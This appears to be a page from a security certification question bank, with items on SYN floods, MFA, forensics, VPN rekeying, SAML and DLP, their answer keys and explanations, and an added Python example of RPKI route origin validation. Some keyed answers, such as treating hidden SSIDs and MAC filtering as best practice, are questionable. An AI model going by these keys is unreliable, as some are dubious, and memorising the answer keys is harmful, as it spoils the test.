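The validation the explanation describes, as an added Python example (not router vendor code and not from the question bank): the RFC 6811 route-origin-validation outcome for an announcement against a set of ROAs, followed by the usual operator policy of dropping invalids and accepting valid and not-found. The ROA cache, prefixes and AS numbers are constructed from documentation ranges; the AS0 ROA shows how a holder declares that a prefix must never be originated.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    prefix: str       # e.g. "203.0.113.0/24"
    max_length: int   # longest prefix length the holder authorizes
    asn: int          # authorized origin AS (0 means "nobody may originate this")


# Constructed validated ROA cache (what an RPKI validator hands the router via RTR). Not live data.
ROAS = [
    ROA("203.0.113.0/24", 24, 64500),
    ROA("198.51.100.0/22", 24, 64501),
    ROA("192.0.2.0/24", 24, 0),  # AS0 ROA: the prefix should never appear in the global table
]


def covering_roas(prefix: str, roas):
    """ROAs whose prefix contains the announced prefix (same address family)."""
    net = ipaddress.ip_network(prefix, strict=False)
    out = []
    for r in roas:
        roa_net = ipaddress.ip_network(r.prefix)
        if roa_net.version == net.version and net.subnet_of(roa_net):
            out.append(r)
    return out


def route_origin_validation(prefix: str, origin_asn: int, roas=ROAS) -> str:
    """RFC 6811 outcome for one announcement.
    not-found: no ROA covers the prefix (RPKI says nothing; policy usually accepts).
    valid:     a covering ROA matches the origin AS and the announced length <= maxLength.
    invalid:   ROAs cover the prefix but none matches (wrong origin, or too-specific prefix)."""
    net = ipaddress.ip_network(prefix, strict=False)
    covering = covering_roas(prefix, roas)
    if not covering:
        return "not-found"
    for r in covering:
        if r.asn == origin_asn and net.prefixlen <= r.max_length:
            return "valid"
    return "invalid"


def apply_policy(announcements, roas=ROAS):
    """Typical operator policy: drop invalid; accept valid and not-found."""
    kept, dropped = [], []
    for prefix, asn in announcements:
        bucket = dropped if route_origin_validation(prefix, asn, roas) == "invalid" else kept
        bucket.append((prefix, asn))
    return kept, dropped


if __name__ == "__main__":
    for prefix, asn in [("203.0.113.0/24", 64500), ("203.0.113.0/24", 64666), ("203.0.113.0/25", 64500)]:
        print(prefix, asn, route_origin_validation(prefix, asn))
```

The /25 case is the one operators get wrong most often: the origin AS is correct, but because the announced prefix is longer than the ROA's maxLength it is still invalid, which is exactly how ROAs block the more-specific hijack that would otherwise win on longest-prefix match.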

264
MCQeasy

A network security analyst receives an alert from the intrusion detection system (IDS) indicating a high volume of TCP SYN packets to a single external IP address from a compromised internal host. This is characteristic of which type of attack?

A.SYN flood
B.Man-in-the-middle
C.ARP spoofing
D.DNS amplification
AnswerA

A SYN flood uses a high volume of TCP SYN packets to overwhelm the target's connection queue.

Why this answer

A SYN flood attack exploits the TCP three-way handshake by sending a high volume of SYN packets to a target, exhausting its half-open connection table and preventing legitimate connections. The IDS alert describes a compromised internal host generating many SYN packets to a single external IP, which is the classic signature of a SYN flood seen from the sending side: the internal host is acting as a bot in a (possibly distributed) denial-of-service attack against that external target, and the response is to contain the host and notify the target's operator, not only to watch the traffic.

Exam trap

The trap here is that candidates confuse a SYN flood (which uses TCP SYN packets to exhaust resources) with a DNS amplification attack (which uses UDP and reflection), but the question's mention of 'TCP SYN packets' directly points to the SYN flood, not a volumetric reflection attack.

How to eliminate wrong answers

Option B is wrong because a man-in-the-middle attack involves intercepting and potentially altering communications between two parties, not generating a high volume of SYN packets to a single external IP. Option C is wrong because ARP spoofing operates at Layer 2 by associating an attacker's MAC address with a legitimate IP address on a local network, not by sending TCP SYN packets to an external IP. Option D is wrong because a DNS amplification attack uses small DNS queries with spoofed source IPs to generate large responses directed at a victim, relying on UDP and DNS servers, not TCP SYN packets from a compromised host.

265
MCQeasy

A company requires employees to authenticate using a smart card and PIN to access the corporate network. This is an example of which type of authentication?

A.Single-factor authentication
B.Biometric authentication
C.Two-factor authentication
D.Single sign-on
AnswerC

Correct – smart card (something you have) and PIN (something you know) are two distinct factors.

Why this answer

This scenario requires two distinct authentication factors: something you have (the smart card) and something you know (the PIN). Smart cards store a private key or certificate that must be unlocked by the PIN, and both factors must be presented simultaneously to authenticate. This meets the NIST SP 800-63 definition of multi-factor authentication, specifically two-factor authentication.

Exam trap

The trap here is that candidates may mistakenly think a smart card alone is a single factor, forgetting that the PIN is a separate knowledge factor, or they may confuse two-factor authentication with SSO because both can involve a single login event.

How to eliminate wrong answers

Option A is wrong because single-factor authentication uses only one factor (e.g., just a password or just a smart card), but here both a smart card and a PIN are required. Option B is wrong because biometric authentication relies on physical characteristics like fingerprints or iris patterns, not a smart card and PIN. Option D is wrong because single sign-on (SSO) allows a user to authenticate once and access multiple systems without re-entering credentials, but it does not define the number of factors used in that initial authentication.

266
Multi-Selectmedium

A company is conducting a security assessment of its network infrastructure. Which of the following activities are typically performed during a vulnerability assessment? (Select TWO.)

Select 2 answers
A.Identification of missing security patches
B.Attempting to crack password hashes
C.Social engineering attacks against employees
D.Exploiting identified vulnerabilities to gain unauthorized access
E.Automated scanning of open ports and services
AnswersA, E

Patch identification is a key component of vulnerability assessment.

Why this answer

A and E are correct because vulnerability assessments identify and catalogue weaknesses without exploiting them. Automated scanning of open ports and services (E) is the discovery step, and identification of missing security patches (A) is a typical finding from scanners such as Nessus or OpenVAS, which compare detected versions and configurations against vulnerability databases (e.g., CVE). Cracking hashes, social engineering and exploiting findings (B, C, D) all go beyond identification and belong to penetration testing.

Exam trap

The trap here is confusing vulnerability assessment (identification only) with penetration testing (identification plus exploitation), leading candidates to select 'Exploiting identified vulnerabilities to gain unauthorized access' as a correct activity.

267
MCQ · easy

A system administrator notices that user accounts are often left active after employees leave the company. Which process should be automated to address this?

A. Single sign-on implementation
B. Password reset policy
C. Multi-factor authentication
D. Automated account provisioning and deprovisioning
Answer: D

This process ensures accounts are created and disabled in sync with HR records.

Why this answer

Automated provisioning and deprovisioning ensures accounts are disabled when employment ends. Password resets and SSO do not solve the issue of stale accounts. MFA adds security but does not remove accounts.

268
MCQ · medium

During a forensic investigation, the team needs to preserve evidence from a running server. What is the FIRST step the team should take?

A. Capture a memory dump.
B. Create a disk image.
C. Shut down the server normally.
D. Unplug the network cable.
Answer: A

Preserves volatile evidence critical for analysis.

Why this answer

The first step in a forensic investigation of a running server is to capture a memory dump because volatile data (RAM) contains critical evidence such as running processes, network connections, encryption keys, and malware that would be lost if the system is powered off or altered. Preserving this volatile state before any other action ensures that the most transient evidence is secured, following the order of volatility principle. Capturing memory first prevents irreversible loss of data that cannot be recovered from disk or network captures.

Exam trap

The trap here is that candidates often confuse the urgency of preserving volatile data with the desire to immediately isolate the system from the network, leading them to choose unplugging the network cable first, but the correct forensic priority is to capture the most volatile evidence (memory) before any network or power actions.

How to eliminate wrong answers

Option B is wrong because creating a disk image is a non-volatile data acquisition step that should occur after capturing memory, as disk imaging does not preserve volatile evidence like running processes or encryption keys. Option C is wrong because shutting down the server normally would cause the operating system to cleanly terminate processes, potentially destroying evidence such as temporary files, network connections, and memory-resident malware, and may trigger anti-forensic mechanisms. Option D is wrong because unplugging the network cable, while it may prevent remote tampering, is not the first step; it should be performed after memory capture to avoid disrupting network-based evidence (e.g., active connections, network traffic logs) that could be captured from memory first.

269
Drag & Drop · medium

Drag and drop the steps for conducting a business impact analysis (BIA) in the correct order.

Why this order

BIA starts with identifying critical functions, then determining their MTD, identifying dependencies, assessing impacts, and finally documenting priorities.

270
MCQ · medium

A company uses smart cards for authentication to workstations. A user inserts their smart card but is prompted for a PIN. The user enters the correct PIN but authentication fails. The smart card is not expired. What is the most likely cause?

A. The user's certificate is revoked
B. The PIN is incorrectly stored on the card
C. The smart card driver is outdated
D. The workstation's clock is off by more than 5 minutes
Answer: A

Revoked certificate causes authentication failure despite correct PIN.

Why this answer

When a smart card is used for authentication, the PIN unlocks the private key stored on the card, but the actual authentication typically relies on a certificate chain and the validity of the user's certificate. If the certificate has been revoked (e.g., due to compromise or termination), the Certificate Revocation List (CRL) or Online Certificate Status Protocol (OCSP) check will fail, causing authentication to be denied even though the PIN is correct and the card is not expired.

Exam trap

The trap here is that candidates assume PIN entry failure is the only smart card authentication issue, but the PIN only unlocks the private key; the certificate's revocation status is a separate, often overlooked, layer that can cause authentication to fail after correct PIN entry.

How to eliminate wrong answers

Option B is wrong because the PIN is not stored on the card; the PIN is a user-entered secret used to unlock the card's private key, and if the PIN were incorrectly stored, the card would reject the PIN entry itself, not allow entry and then fail authentication. Option C is wrong because an outdated smart card driver would typically cause the card reader to not be recognized or the card to not be read at all, not allow PIN entry and then fail authentication. Option D is wrong because a workstation clock skew of more than 5 minutes could cause certificate validity period checks to fail, but this would affect the certificate's 'not before' or 'not after' dates, not revocation status; revocation is checked via CRL/OCSP independently of system time.

271
MCQ · medium

A multinational corporation maintains site-to-site IPsec VPN tunnels between its headquarters and three regional branch offices. Over the past week, the tunnels have been dropping intermittently, causing disruption to real-time applications. The network team checked logs and found frequent 'Phase 2 rekey failure' messages. The tunnels are configured with IKEv1 and preshared keys. The headquarters uses a Cisco ASA, and the branches use various vendors' firewalls. The team verified that firewall policies allow IPsec traffic, and there is no packet loss on the WAN links. Which action should the team take to resolve the issue most effectively?

A. Increase the MTU on the WAN interfaces to 1500 bytes on all firewalls.
B. Change the encryption algorithm from AES-256 to 3DES on all peers.
C. Migrate all VPN connections from IPsec to SSL VPN using clientless access.
D. Adjust the Dead Peer Detection (DPD) intervals and Phase 2 lifetime settings to be consistent across all sites.
Answer: D

Consistent DPD timers and lifetimes prevent premature rekey attempts or missed rekeys, stabilizing the tunnels.

Why this answer

The frequent 'Phase 2 rekey failure' messages indicate a mismatch in IPsec security association (SA) parameters between the Cisco ASA and the branch firewalls. IKEv1 Phase 2 lifetimes and Dead Peer Detection (DPD) intervals must be consistent across all peers; otherwise, one side may attempt to rekey or declare the peer dead while the other expects a different timing, causing intermittent tunnel drops. Adjusting these values to match across all sites resolves the rekey failures without compromising security or requiring a protocol migration.

Exam trap

ISC2 often tests the misconception that rekey failures are caused by encryption algorithm mismatches or MTU issues, but the real cause is almost always inconsistent Phase 2 lifetimes or DPD intervals when using IKEv1 with multiple vendor firewalls.

How to eliminate wrong answers

Option A is wrong because increasing MTU to 1500 bytes is the default for Ethernet and does not address Phase 2 rekey failures; MTU issues typically cause fragmentation or packet loss, not rekey mismatches. Option B is wrong because changing from AES-256 to 3DES weakens encryption and does not fix rekey failures; the problem is timing/parameter consistency, not cipher strength. Option C is wrong because migrating to SSL VPN with clientless access is a completely different architecture that would not resolve IPsec Phase 2 rekey failures and would introduce new complexity; the issue is specific to IKEv1 Phase 2 lifetime mismatches, not the VPN protocol type.

272
MCQ · easy

During a security audit, an organization discovers that several employees are sharing a single generic account to access a critical database. Which principle of security operations is being violated?

A. Accountability
B. Separation of duties
C. Defense in depth
D. Least privilege
Answer: A

Account sharing removes the ability to trace actions to an individual, violating accountability.

Why this answer

Accountability requires that each individual user be uniquely identified and their actions traceable. Sharing a generic account breaks this chain because the audit logs cannot attribute specific database operations (e.g., SELECT, UPDATE, DELETE) to a particular employee, making it impossible to hold anyone responsible for misuse or errors.

Exam trap

The trap here is that candidates confuse the lack of individual accountability with the principle of least privilege, assuming that sharing a generic account automatically means excessive permissions, when the real violation is the inability to uniquely identify and trace user actions.

How to eliminate wrong answers

Option B is wrong because separation of duties involves splitting critical tasks among multiple people to prevent fraud (e.g., requiring two different users to authorize and execute a transaction), which is not directly violated by shared accounts. Option C is wrong because defense in depth is a layered security strategy (e.g., firewalls, IDS, encryption) that remains intact even if a single account is shared; the violation here is about identity and audit, not defense layers. Option D is wrong because least privilege restricts users to the minimum permissions needed for their role; while shared accounts may also have excessive privileges, the core violation in this scenario is the inability to attribute actions to individuals, not the level of access rights.

273
MCQ · medium

Refer to the exhibit. What is the purpose of the NAT configuration on R1?

A. To translate internal private addresses to the IP address of the FastEthernet0/0 interface.
B. To translate internal private addresses to a pool of public addresses.
C. To translate internal private addresses to a static public address.
D. To translate internal private addresses to the IP address of the Serial0/0 interface using PAT.
Answer: D

Correct. The 'overload' keyword enables PAT, and the interface IP is used as the translated address.

Why this answer

The configuration uses dynamic NAT with PAT (overload). It translates source addresses from the inside network (192.168.1.0/24) to the IP address of the Serial0/0 interface (the outside interface). This allows multiple internal hosts to share the single public IP address.

274
Multi-Select · easy

A network administrator is configuring switches to prevent VLAN hopping attacks. Which TWO of the following measures should be implemented?

Select 2 answers
A. Use private VLANs on all trunk ports.
B. Set the native VLAN to an unused VLAN.
C. Enable BPDU guard on all access ports.
D. Disable Dynamic Trunking Protocol (DTP) on trunk ports.
E. Implement port security on all access ports.
Answers: B, D

This prevents double-tagging attacks by ensuring the native VLAN is not used by any user traffic.

Why this answer

Setting the native VLAN to an unused VLAN prevents VLAN hopping via double-tagging attacks. In a double-tagging attack, an attacker sends frames with two 802.1Q tags; the first tag is stripped by the trunk's native VLAN, and the second tag allows the frame to hop to a different VLAN. By using an unused VLAN as the native VLAN, there are no hosts on that VLAN to receive or exploit the double-tagged traffic. Disabling DTP on trunk ports, the other correct measure, stops a connected device from negotiating a trunk link with the switch, which is the other common route to VLAN hopping.

Exam trap

ISC2 often tests the distinction between access port security features (like BPDU guard and port security) and trunk-specific controls (like DTP disablement and native VLAN configuration), leading candidates to mistakenly select access port protections for a trunk-based attack.

275
MCQ · hard

An organization uses a federated identity model with multiple external partners. The identity provider (IdP) notices that some partners are sending outdated SAML assertions. What is the best way to mitigate this issue?

A. Require partners to include a timestamp in the assertion.
B. Increase the NotBefore and NotOnOrAfter time window.
C. Configure the IdP to reject assertions with a stale timestamp using the Conditions element.
D. Implement short-lived assertions and require re-authentication.
Answer: C

This enforces assertion freshness and mitigates replay attacks.

Why this answer

Option C is correct because the SAML Conditions element explicitly defines the validity window for an assertion using NotBefore and NotOnOrAfter attributes. By configuring the IdP to validate these timestamps and reject assertions that fall outside the window, the organization directly enforces assertion freshness without relying on partner-side changes or weakening security.

Exam trap

The trap here is that candidates confuse 'requiring a timestamp' (which is already present) with 'validating the timestamp' (which is the actual control), or they mistakenly think widening the time window is a mitigation when it actually increases risk.

How to eliminate wrong answers

Option A is wrong because SAML assertions already include a timestamp (IssueInstant) and the Conditions element; merely requiring a timestamp does not enforce rejection of stale assertions. Option B is wrong because increasing the NotBefore and NotOnOrAfter time window would actually make the system more permissive to stale assertions, not mitigate the issue. Option D is wrong because implementing short-lived assertions and requiring re-authentication shifts the burden to partners and may cause usability issues; it does not directly address the IdP's ability to reject already-outdated assertions from non-compliant partners.

276
Multi-Select · hard

Which THREE of the following are key considerations when implementing a data retention policy for an organization subject to multiple legal jurisdictions?

Select 3 answers
A. Varying statutory retention periods across jurisdictions
B. Potential litigation holds that require preserving data beyond normal retention
C. The cost of maintaining long-term storage for large volumes of data
D. The organization's ability to delete data after the minimum retention period
E. The data owner's personal preference for deletion timelines
Answers: A, B, C

Different jurisdictions have different laws; the policy must comply with the longest applicable retention period.

Why this answer

Option A is correct because different legal jurisdictions impose distinct statutory retention periods for various data types (e.g., GDPR requires retention no longer than necessary, while HIPAA mandates 6 years for medical records). A data retention policy must account for these varying minimums to ensure compliance across all applicable laws. Failing to reconcile conflicting periods can lead to legal penalties or data deletion before a jurisdiction’s requirement is met.

Exam trap

The trap here is that candidates often confuse operational convenience (like cost of storage) with a core legal consideration, or they mistakenly think a data owner’s preference is a valid input for a compliance-driven policy, when in fact only statutory and regulatory requirements are primary.

277
MCQ · easy

A small business wants to implement a risk management framework. Which approach is best for identifying risks?

A. Quantitative analysis
B. Penetration testing
C. Threat modeling
D. Qualitative analysis
Answer: D

Uses relative rankings and is practical for organizations with limited data.

Why this answer

Qualitative analysis is cost-effective and does not require precise data, making it suitable for small businesses. Quantitative analysis is resource-intensive. Threat modeling is specific to certain scenarios.

Penetration testing is a validation technique, not a broad risk identification method.

278
MCQ · hard

An organization implements a data loss prevention (DLP) solution to monitor data in motion. Which type of data is typically most challenging to detect?

A. Data in images
B. Structured data in CSV files
C. Encrypted traffic
D. Unstructured data in email attachments
Answer: C

Encryption hides content, requiring decryption or metadata analysis.

Why this answer

Encrypted traffic is the most challenging data in motion for DLP to inspect because the payload is obfuscated by encryption protocols such as TLS 1.3 or IPsec. Without decryption (e.g., via a proxy with TLS interception), the DLP sensor cannot read the content to match patterns or keywords, rendering traditional deep packet inspection ineffective.

Exam trap

The trap here is that candidates assume 'data in images' is hardest because it is non-textual, but DLP can use OCR and image analysis, whereas encrypted traffic is fundamentally opaque without decryption keys.

How to eliminate wrong answers

Option A is wrong because data in images can be detected via optical character recognition (OCR) or steganography analysis; although this is harder than scanning plaintext, the content is still inspectable. Option B is wrong because structured data in CSV files has predictable delimiters and patterns (e.g., credit card numbers, SSNs) that DLP regex rules can reliably match. Option D is wrong because unstructured data in email attachments, while varied, is still in plaintext or common binary formats (e.g., PDF, DOCX) that DLP can parse and scan for sensitive content.

279
MCQ · easy

A company deploys a web application that uses TLS to protect data in transit. The security team discovers that the server supports TLS 1.0 and uses a 1024-bit RSA certificate. What is the most significant security concern?

A. The certificate uses an RSA 1024-bit key
B. The server supports TLS 1.0
C. The server does not support HTTP/2
D. The server enables TLS session tickets
Answer: B

TLS 1.0 is deprecated and has known vulnerabilities.

Why this answer

TLS 1.0 is a deprecated protocol with known vulnerabilities, including susceptibility to BEAST and POODLE attacks, which can allow an attacker to decrypt intercepted traffic. While a 1024-bit RSA key is weak, the most immediate and significant risk is the use of an outdated protocol that is actively exploited in the field. Disabling TLS 1.0 and enforcing TLS 1.2 or higher is the critical first step to secure data in transit.

Exam trap

The trap here is that candidates often focus on the weak key length (1024-bit RSA) as the most significant issue, but CISSP emphasizes that using a deprecated protocol (TLS 1.0) with known active exploits is a more urgent and severe security concern than a key that may take significant resources to break.

How to eliminate wrong answers

Option A is wrong because while a 1024-bit RSA key is considered weak and can be factored with sufficient resources, the immediate and most significant security concern is the use of TLS 1.0, which has known, practical attacks that can be executed today. Option C is wrong because HTTP/2 is a performance enhancement, not a security requirement; its absence does not introduce a direct vulnerability to data in transit. Option D is wrong because TLS session tickets, while having some security considerations (e.g., forward secrecy if not implemented correctly), are not as critical as the use of a deprecated protocol like TLS 1.0, which is actively targeted by attackers.

280
Multi-Select · hard

Which THREE of the following are valid countermeasures against buffer overflow attacks?

Select 3 answers
A. Stack canaries
B. Full disk encryption
C. Address space layout randomization (ASLR)
D. Non-executable stack and heap (NX bit)
E. Input validation using allowlists
Answers: A, C, D

Detects buffer overflows on the stack.

Why this answer

Stack canaries are correct because they place a known value (canary) between the buffer and control data on the stack. Before a function returns, the canary is checked; if it has been overwritten (indicating a buffer overflow), the program terminates, preventing code execution. This directly detects stack-based buffer overflows before they can hijack the return address. ASLR and the NX bit are correct for related reasons: ASLR randomizes the process memory layout so an overflow cannot reliably target known addresses, and the NX bit marks stack and heap pages non-executable so that injected code cannot run even if an overflow succeeds.

Exam trap

The trap here is that candidates often confuse general security controls (like input validation or encryption) with specific memory protection mechanisms, leading them to select options that are good practices but not direct countermeasures against buffer overflow attacks.

281
MCQ · hard

During a security audit of a financial application, the auditor discovers that the application uses a custom encryption algorithm for storing sensitive data. The developer claims it is more efficient than AES. What should the auditor recommend?

A. Conduct additional penetration testing on the encryption implementation
B. Accept the risk if the algorithm is more efficient
C. Perform a cryptanalysis of the algorithm to validate its strength
D. Migrate to a widely accepted encryption standard such as AES
Answer: D

Standard algorithms are extensively reviewed and trusted.

Why this answer

Custom encryption algorithms are highly risky because they have not undergone the extensive peer review and cryptanalysis that standards like AES have. Even if the developer claims better efficiency, the lack of proven security guarantees makes the application vulnerable to attacks. The correct recommendation is to migrate to a widely-accepted standard such as AES, which is FIPS 197 validated and trusted for protecting sensitive financial data.

Exam trap

The trap here is that candidates may think performing cryptanalysis (Option C) is a valid audit recommendation, but in practice, the auditor's role is to enforce the use of proven standards, not to validate unproven custom cryptography.

How to eliminate wrong answers

Option A is wrong because additional penetration testing on a custom encryption implementation cannot uncover fundamental cryptographic weaknesses; penetration testing is not a substitute for formal cryptanalysis or algorithm validation. Option B is wrong because accepting the risk based solely on efficiency claims violates the principle of using proven, standardized cryptography for sensitive data; efficiency does not equate to security. Option C is wrong because performing a cryptanalysis of the custom algorithm is not a practical recommendation for an auditor; it requires expert cryptographers and extensive time, and even then, the algorithm may still have undiscovered flaws, whereas migrating to a proven standard is the immediate and correct security control.

282
MCQ · easy

In the context of physical security, which of the following is an example of a preventive control?

A. Security guards monitoring
B. CCTV cameras
C. Intrusion detection system
D. Mantrap door
Answer: D

Correct. A mantrap prevents tailgating and unauthorized access.

Why this answer

A mantrap door is a preventive physical security control because it actively prevents unauthorized entry by requiring authentication and verification before allowing passage through a series of interlocking doors. Unlike monitoring or detection systems, a mantrap physically blocks access until the user is validated, thereby stopping a breach before it occurs.

Exam trap

The trap here is confusing preventive controls (which stop an incident) with detective controls (which identify an incident after it occurs), leading candidates to incorrectly select CCTV or IDS as preventive measures.

How to eliminate wrong answers

Option A is wrong because security guards monitoring is a detective and deterrent control, not a preventive one; guards observe and report incidents but do not physically block access. Option B is wrong because CCTV cameras are a detective control that records events for after-the-fact review; they do not prevent an intrusion from happening. Option C is wrong because an intrusion detection system (IDS) is a detective control that alerts on suspicious activity but does not actively block or prevent the intrusion.

283
MCQ · hard

An organization is implementing a privileged access management (PAM) solution for managing administrative credentials. Which of the following is the most critical control to prevent credential theft?

A. Enforcing periodic password changes
B. Just-in-time (JIT) privilege elevation
C. Encrypting stored passwords
D. Multi-factor authentication on admin accounts
E. Session recording and monitoring
Answer: B

JIT reduces standing privileges, limiting the impact of credential theft.

Why this answer

Just-in-time privilege elevation (Option B) is correct because it minimizes the window of exposure and reduces standing privileges, which is the most effective control against credential theft. Multi-factor authentication (Option D) is important but does not prevent theft of cached credentials. Periodic password changes (Option A) are reactive.

Session recording (Option E) is a detective control. Encrypting stored passwords (Option C) protects credentials at rest but does not prevent theft while they are in use.

284
MCQ · medium

A security analyst receives an alert that a host in the internal network is sending abnormal amounts of traffic to an external IP. The traffic uses destination port 53. What is the most likely attack?

A. DNS cache poisoning
B. DNS amplification
C. DNS tunneling
D. DNS zone transfer
Answer: C

DNS tunneling encapsulates data in DNS queries to exfiltrate information, causing abnormal traffic patterns.

Why this answer

The alert describes a host sending abnormal traffic to an external IP on destination port 53, which is the default port for DNS. DNS tunneling exploits the DNS protocol to encapsulate non-DNS data (e.g., commands or exfiltrated files) within DNS queries and responses, allowing covert communication through firewalls that typically allow DNS traffic. The abnormal volume of traffic to a single external IP is a classic indicator of a DNS tunnel, as the compromised host continuously sends encoded data to an external command-and-control server.

Exam trap

The trap here is that candidates confuse the use of port 53 with DNS amplification attacks, but amplification requires a victim IP and open resolvers, not a single internal host sending traffic to an external IP.

How to eliminate wrong answers

Option A is wrong because DNS cache poisoning (also known as DNS spoofing) involves injecting forged DNS records into a resolver's cache to redirect traffic, not generating abnormal outbound traffic from a single host. Option B is wrong because DNS amplification is a distributed denial-of-service (DDoS) attack that uses open resolvers to flood a victim with large responses, but the alert describes a single internal host sending traffic outbound, not a reflector sending amplified traffic to a victim. Option D is wrong because a DNS zone transfer is a legitimate mechanism for replicating DNS zone data between authoritative servers, typically using TCP port 53, and is not an attack that causes a single host to send abnormal traffic to an external IP.

285
MCQ · hard

A financial services firm recently deployed a multi-factor authentication (MFA) solution for remote access to its trading platform. The MFA requires a one-time password (OTP) via a mobile app, in addition to a username and password. Since deployment, remote traders have complained that the authentication process takes too long, especially during market open hours. The help desk reports that many traders are accidentally locking their accounts due to multiple failed OTP attempts. The security team wants to maintain strong security but improve user experience. Which action should the security team take?

A. Reduce MFA to two factors by removing the OTP requirement
B. Remove MFA requirements during peak hours to improve performance
C. Implement risk-based adaptive MFA that prompts only when anomalous activity is detected
D. Extend the OTP validity window to 10 minutes to reduce time pressure
Answer: C

Adaptive MFA balances security and user experience by requiring additional factors only when risk is elevated.

Why this answer

Option C is correct because risk-based adaptive MFA evaluates the context of each authentication request (e.g., location, device, time, behavior) and only triggers an OTP challenge when the risk score exceeds a threshold. This reduces friction for legitimate traders during peak hours while maintaining strong security against anomalous access attempts, directly addressing the complaint of slow authentication without weakening the overall security posture.

Exam trap

The trap here is that candidates may assume extending the OTP validity window (Option D) is a harmless usability fix, but CISSP tests the understanding that longer OTP windows increase the risk of replay attacks and violate the principle of short-lived credentials, whereas adaptive authentication is the correct balance of security and usability.

How to eliminate wrong answers

Option A is wrong because reducing MFA to two factors by removing the OTP requirement would weaken authentication to only username/password, violating the principle of defense-in-depth and exposing the trading platform to credential theft. Option B is wrong because removing MFA during peak hours creates a predictable window of vulnerability that attackers could exploit, directly contradicting the security team's goal to maintain strong security. Option D is wrong because extending the OTP validity window to 10 minutes increases the window of opportunity for replay attacks (e.g., if an OTP is intercepted or leaked) and does not address the root cause of user frustration—the frequency of unnecessary OTP prompts—while also violating NIST SP 800-63B recommendations for short-lived OTPs.

286
MCQ · hard

You are the security architect for a multinational corporation that handles highly sensitive intellectual property (IP) and personally identifiable information (PII) for clients in multiple jurisdictions, including GDPR and CCPA regions. The company recently experienced a data breach where an attacker exfiltrated 50 GB of data from a file server by exploiting a vulnerability in the backup software. The backup software had been configured with default credentials and was accessible from the internet. The security team has implemented compensating controls, but management wants to prevent such incidents in the future. You have been asked to recommend a long-term strategy to protect sensitive data assets. The budget is limited, and the solution must minimize user friction. Current environment: On-premises Active Directory with Windows file servers, some data in AWS S3, and a mix of laptops and mobile devices. The organization uses Microsoft 365 for email and collaboration. Which of the following is the BEST course of action?

A. Deploy a data classification and labeling solution integrated with endpoint and network DLP to automatically detect and protect sensitive data
B. Implement multi-factor authentication (MFA) for all administrative accounts and backup interfaces
C. Encrypt all data at rest using AES-256 and implement strict key management policies
D. Segment the backup network from the production network and enforce strict firewall rules
Answer: A

A data-centric approach identifies sensitive data and applies automated controls, reducing the risk of exfiltration across all vectors.

Why this answer

Option A is correct because data classification and labeling, integrated with endpoint and network DLP, directly addresses the root cause: the inability to distinguish sensitive data from non-sensitive data. By automatically classifying and labeling IP and PII, the organization can enforce policy-based protections (e.g., blocking exfiltration, applying encryption) without relying solely on perimeter controls. This minimizes user friction by automating detection and response, and it scales across on-premises, cloud (AWS S3), and Microsoft 365 environments, aligning with GDPR and CCPA requirements for data protection.

Exam trap

The trap here is that candidates often choose MFA or encryption as a silver bullet, but the CISSP exam emphasizes that data classification is the foundational control for protecting sensitive assets, especially when the threat involves data exfiltration via a compromised application, not just unauthorized access or theft of media.

How to eliminate wrong answers

Option B is wrong because MFA for administrative accounts and backup interfaces is a compensating control that reduces the risk of credential theft, but it does not prevent an attacker who exploits a software vulnerability (as in the breach) from exfiltrating data; the backup software was accessible from the internet with default credentials, but MFA would not have stopped the vulnerability exploitation if the attacker bypassed authentication or used a different vector. Option C is wrong because encrypting all data at rest with AES-256 protects data if storage media is stolen, but it does not prevent exfiltration via a live file server or backup software; the attacker exfiltrated data while the server was online and decrypted, so encryption at rest is irrelevant to the attack vector. Option D is wrong because network segmentation and firewall rules reduce the attack surface but do not address the core issue of sensitive data being accessible and unlabeled; the attacker exploited a vulnerability in backup software, and segmentation alone cannot prevent exfiltration if the attacker already has access to the backup network or if the vulnerability allows lateral movement.

287
Multi-Select · medium

Which THREE of the following are best practices for securing a wireless network?

Select 3 answers
A. Disable SSID broadcast.
B. Enable WPS (Wi-Fi Protected Setup).
C. Use WEP encryption.
D. Use WPA2-Enterprise with 802.1X authentication.
E. Implement MAC address filtering.
Answers: A, D, E

Makes the network less visible to casual scanners.

Why this answer

Disabling SSID broadcast prevents the access point from including the network name in beacon frames. While this does not hide the network from determined attackers using packet analyzers, it reduces casual discovery and is considered a basic security hardening step in defense-in-depth.

Exam trap

The trap here is that candidates often mistake 'security by obscurity' (disabling SSID broadcast) as a primary control, while overlooking that WPS and WEP are fundamentally broken protocols that should never be used in a secure deployment.

288
Multi-Select · medium

Which TWO protocols are commonly used for identity federation?

Select 2 answers
A. LDAP
B. OAuth 2.0
C. OpenID Connect
D. RADIUS
E. SAML 2.0
Answers: C, E

OpenID Connect is an identity layer on top of OAuth 2.0 for federated authentication.

Why this answer

OpenID Connect (OIDC) is an identity layer built on top of OAuth 2.0 that enables clients to verify the identity of an end-user based on the authentication performed by an authorization server. It provides a standardized way to obtain identity claims via an ID token (JWT) and is widely used for federated identity scenarios, such as single sign-on (SSO) across domains. SAML 2.0 is an XML-based protocol for exchanging authentication and authorization data between an identity provider (IdP) and a service provider (SP), making it a cornerstone of enterprise identity federation.

Exam trap

The trap here is that candidates often confuse OAuth 2.0 with OpenID Connect, mistakenly selecting OAuth 2.0 as a federation protocol when it is solely an authorization framework, not an identity protocol—OpenID Connect is the correct identity layer built on top of it.

289
Multi-Select · medium

Which THREE of the following are control families defined in NIST SP 800-53? (Choose three.)

Select 3 answers
A. Access Control (AC)
B. System and Communications Protection (SC)
C. Data Encryption (DE)
D. Business Continuity (BC)
E. Identification and Authentication (IA)
Answers: A, B, E

Access Control is a NIST control family.

Why this answer

Options A, B, and E are correct: Access Control (AC), System and Communications Protection (SC), and Identification and Authentication (IA) are NIST SP 800-53 control families. Option C (Data Encryption) is not a family; encryption requirements are covered under SC. Option D (Business Continuity) is not a family; continuity is covered under Contingency Planning (CP).

290
MCQ · medium

During a security assessment, it is found that service accounts have interactive logon rights. What is the BEST remediation?

A. Implement Group Policy to deny interactive logon for service accounts.
B. Ensure service accounts use strong passwords.
C. Use managed service accounts instead.
D. Remove service accounts from the local Administrators group.
Answer: C

MSAs have no interactive logon rights and automatically rotate passwords.

Why this answer

Managed Service Accounts (MSAs) are the best remediation because they are designed specifically for service accounts, automatically manage password changes, and by default have no interactive logon rights. This eliminates the security risk of interactive logon while also addressing password management and reducing administrative overhead. Group Policy changes or manual password policies do not address the underlying architectural issue of using a standard user account for a service.

Exam trap

